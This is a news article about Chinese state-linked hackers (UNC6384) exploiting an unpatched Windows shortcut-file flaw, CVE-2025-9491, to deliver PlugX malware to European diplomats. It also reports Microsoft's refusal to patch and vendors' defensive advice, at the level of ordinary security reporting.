Cyberwarfare / Nation-State Attacks
,
Fraud Management & Cybercrime
Chinese Hackers Exploit Windows Vulnerability Against European Diplomats
Security researchers have reported that Chinese nation-state hackers are actively using a Windows vulnerability to target European diplomatic missions. Microsoft has indicated that the flaw, identified as CVE-2025-9491, does not warrant an official patch at this time, despite its widespread exploitation.
During September and October, managed detection and response company Arctic Wolf detected a group known as UNC6384 attempting to compromise Hungarian and Belgian diplomatic entities within the European Union. This campaign utilizes a Windows flaw related to the processing of .lnk files—desktop shortcuts that can inadvertently lead to malware installations.
Threat actors employed social engineering tactics to lure victims into interacting with malicious .lnk files, which were disguised as ordinary documents. Once opened, these files initiate a command to download malware. Previous reports have shown that similar vulnerabilities have been exploited by both North Korean and Russian state-sponsored hackers.
Despite being aware of this vulnerability since at least September 2024, Microsoft classified it as of low severity and has repeatedly stated that it does not plan to release a fix. While users may face multiple security warnings when opening a malicious file, Microsoft believes the risk is manageable. They urge users to avoid engaging with files from unknown sources and highlighted that protective measures through Microsoft Defender are already in place to detect such threats.
Trend Micro’s analysis characterizes this vulnerability as a substantial risk to organizations, advising them to disable the execution of shortcut files from untrusted origins as a precautionary measure. The tactics employed in this attack align with those identified in the MITRE ATT&CK framework, specifically concerning initial access via spear phishing and the use of techniques for persistence such as DLL side-loading and malicious file execution.
The operation involved targeting diplomats with spear-phishing emails, disguising malicious files as agendas for legitimate European Commission meetings. Ultimately, a version of PlugX malware was deployed, which has been a consistent tool in Chinese cyber-espionage since 2008. Evidence suggests this group may also have links to Mustang Panda, another Chinese hacker collective focused on government breaches.
Upon execution, the malicious files decode an archive and utilize PowerShell to install malware while simultaneously displaying a decoy document to hide the true nature of the attack. Remarkably, the PlugX variant has developed techniques to obfuscate itself, creating hidden directories and changing operational files, thereby enhancing its stealth and complicating detection efforts.
The rapid adaptability demonstrated by these cyber-espionage operations underscores the broader geopolitical tensions between Europe and China, magnifying concerns particularly due to China’s needling role amidst international conflicts. This persistent threat landscape emphasizes the necessity for organizations to remain vigilant in protecting against sophisticated cyber threats.
